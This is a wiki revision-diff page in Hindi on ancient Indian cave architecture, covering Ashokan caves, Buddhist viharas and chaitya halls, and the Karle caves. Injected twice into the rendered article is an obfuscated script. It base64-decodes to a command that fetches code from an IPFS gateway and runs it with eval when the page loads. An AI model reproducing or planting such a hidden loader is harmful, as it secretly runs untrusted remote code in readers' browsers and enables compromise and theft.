Difference between revisions of "गुहा वास्तु"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (श्रेणी:नया पन्ना; Adding category Category:कला कोश (को हटा दिया गया हैं।))
m (Text replace - "दरवाजे" to "दरवाज़े")
 
(4 intermediate revisions by 3 users not shown)
Line 5: Line 5:
 
*[[भारत]] के विभिन्न भागों में सैकड़ों गुहायें बिखरी पड़ी हैं।  
 
*[[भारत]] के विभिन्न भागों में सैकड़ों गुहायें बिखरी पड़ी हैं।  
 
*इनमें से जो गुहायें बौद्ध विहारों के रूप में प्रयुक्त होती थीं, वे सादी होती थीं। उनके बीचों-बीच एक विशाल मंडप तथा किनारे-किनारे छोटी-छोटी कोठरियाँ होती थीं।  
 
*इनमें से जो गुहायें बौद्ध विहारों के रूप में प्रयुक्त होती थीं, वे सादी होती थीं। उनके बीचों-बीच एक विशाल मंडप तथा किनारे-किनारे छोटी-छोटी कोठरियाँ होती थीं।  
*पूजा के लिए प्रयुक्त गुहाएँ 'चैत्यशाला' कहलाती थीं। जो सुन्दर कला-कृतियाँ होती थीं। चैत्य में एक लम्बा आयताकार मंडप होता था, जिसका अन्तिम भाग गजपृष्ठाकार होता था। स्तम्भों की दो लम्बी पंक्तियाँ इस मंडप को मुख्यकक्षा और दो पार्श्ववीथिकाओं में विभक्त कर देती थीं। गजपृष्ठ में एक स्तूप होता था। द्वारमुख ख़ूब अलंकृत होता था। उसमें तीन दरवाजे होते थे। बीच का द्वार मध्यवर्ती कक्ष में प्रवेश के लिए तथा अन्य दो द्वार पार्श्वथियों के लिए होते थे। चैत्य के ठीक सामने द्वारमुख के ऊपर अश्वपादत्र (घोड़े की नाल) के आकार का चैत्यवाक्ष होता था।  
+
*पूजा के लिए प्रयुक्त गुहाएँ '[[चैत्य गृह]]' कहलाती थीं। जो सुन्दर कला-कृतियाँ होती थीं। चैत्य में एक लम्बा आयताकार मंडप होता था, जिसका अन्तिम भाग गजपृष्ठाकार होता था। स्तम्भों की दो लम्बी पंक्तियाँ इस मंडप को मुख्यकक्षा और दो पार्श्ववीथिकाओं में विभक्त कर देती थीं। गजपृष्ठ में एक स्तूप होता था। द्वारमुख ख़ूब अलंकृत होता था। उसमें तीन दरवाज़े होते थे। बीच का द्वार मध्यवर्ती कक्ष में प्रवेश के लिए तथा अन्य दो द्वार पार्श्वथियों के लिए होते थे। चैत्य के ठीक सामने द्वारमुख के ऊपर अश्वपादत्र (घोड़े की नाल) के आकार का चैत्यवाक्ष होता था।  
*ऐसी अनेक गुहायें [[महाराष्ट्र]] के [[नासिक]], [[भाजा]], भिलसा, कार्ले और अन्य स्थानों पर पाई गई हैं। कार्ले की गुफ़ायें सर्वोत्कृष्ट मानी जाती हैं। इनका निर्माण ईसा पूर्व 200 से ईसा बाद 320 की अवधि में हुआ था।<ref>पुस्तक 'भारतीय इतिहास कोश' पृष्ठ संख्या-132</ref>
+
*ऐसी अनेक गुहायें [[महाराष्ट्र]] के [[नासिक]], [[भाजा]], [[भिलसा]], कार्ले और अन्य स्थानों पर पाई गई हैं। कार्ले की गुफ़ायें सर्वोत्कृष्ट मानी जाती हैं। इनका निर्माण ईसा पूर्व 200 से ईसा बाद 320 की अवधि में हुआ था।<ref>पुस्तक 'भारतीय इतिहास कोश' पृष्ठ संख्या-132</ref>
  
 
{{प्रचार}}
 
{{प्रचार}}
Line 19: Line 19:
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 +
==संबंधित लेख==
 +
{{मौर्य काल}}
 
[[Category:मौर्य काल]]
 
[[Category:मौर्य काल]]
 
[[Category:वास्तु एवं भवन निर्माण विज्ञान]]
 
[[Category:वास्तु एवं भवन निर्माण विज्ञान]]
 
[[Category:इतिहास कोश]]
 
[[Category:इतिहास कोश]]
 
[[Category:कला कोश]]
 
[[Category:कला कोश]]
 +
[[Category:स्थापत्य कला]]
 
__INDEX__
 
__INDEX__

Latest revision as of 05:26, 10 December 2012

  • guha vastu bharatiy prachin vastukala ka ek bahut hi sundar namoona hai.
  • ashok ke shasanakal se guhaoan ka upayog avas ke roop mean hone laga tha.
  • gaya ke nikat barabar paha di par aisi anek gufaean vidyaman haian, jinhean samrat ashok ne avas yogy banavakar ajivakoan ko de diya tha.
  • ashokakalin guhayean sade kamaroan ke roop mean hoti thian, lekin bad mean unhean avas evan upasanagrih ke roop mean stambhoan evan moortiyoan se alankrit kiya jane laga. yah kary vishesh roop se bauddhoan dvara kiya gaya.
  • bharat ke vibhinn bhagoan mean saik doan guhayean bikhari p di haian.
  • inamean se jo guhayean bauddh viharoan ke roop mean prayukt hoti thian, ve sadi hoti thian. unake bichoan-bich ek vishal mandap tatha kinare-kinare chhoti-chhoti kothariyaan hoti thian.
  • pooja ke lie prayukt guhaean 'chaity grih' kahalati thian. jo sundar kala-kritiyaan hoti thian. chaity mean ek lamba ayatakar mandap hota tha, jisaka antim bhag gajaprishthakar hota tha. stambhoan ki do lambi panktiyaan is mandap ko mukhyakaksha aur do parshvavithikaoan mean vibhakt kar deti thian. gajaprishth mean ek stoop hota tha. dvaramukh khoob alankrit hota tha. usamean tin daravaze hote the. bich ka dvar madhyavarti kaksh mean pravesh ke lie tatha any do dvar parshvathiyoan ke lie hote the. chaity ke thik samane dvaramukh ke oopar ashvapadatr (gho de ki nal) ke akar ka chaityavaksh hota tha.
  • aisi anek guhayean maharashtr ke nasik, bhaja, bhilasa, karle aur any sthanoan par paee gee haian. karle ki gufayean sarvotkrisht mani jati haian. inaka nirman eesa poorv 200 se eesa bad 320 ki avadhi mean hua tha.[1]

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. pustak 'bharatiy itihas kosh' prishth sankhya-132

sanbandhit lekh